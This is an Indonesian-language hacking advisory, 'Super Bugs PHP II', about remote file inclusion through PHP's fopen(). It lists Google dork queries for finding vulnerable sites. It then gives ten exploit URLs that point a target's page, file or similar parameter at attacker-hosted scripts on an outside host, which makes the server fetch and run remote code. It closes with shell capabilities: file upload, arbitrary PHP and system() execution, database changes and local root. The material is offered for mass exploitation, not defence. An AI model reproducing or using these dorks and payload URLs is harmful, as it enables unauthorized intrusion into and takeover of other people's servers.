Title :SUPER KIDDIES HACKING "Super Bugs PHP II" Author :K-159 Greetz :KuNTuA, Lieur-Euy, pe_es. Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com ========================================================================================== Proof of Concept : ================== kesalahan url pada fopen ( ) function sehingga attacker bisa menginjeksikan script ke server target. Target : ======== Temukan target nya di google dengan keyword: 1.allinurl:*.php?page=* 2.allinurl:*.php?content=* 3.allinurl:*.php?file=* 4.allinurl:*.php?filename=* 5.allinurl:*.php?link=* 6.allinurl:*.php?view=* 7.allinurl:*.php?sec=* 8.allinurl:*.php?document=* 9.allinurl:*.php?p=* 10.allinurl:*.php?x=* Exploit: ========================================================================================== 1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt 2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt 3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt 4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt 5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt 6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt 7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt 8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt 9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt 10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt Details Exploit: ========================================================================================== Upload a file : upload file ke server target Explore with fopen() function : mencari target yang mengandung fopen pada server target Execute arbitrary PHP functions : membuat script php ke dalam server target Execute a system() command : menjalankan command unix/linux di server target Manager for SQL Server : mengubah settingan data base sql server target System overviewer (get the root !) : mengintip system server target dan melakukan lokal root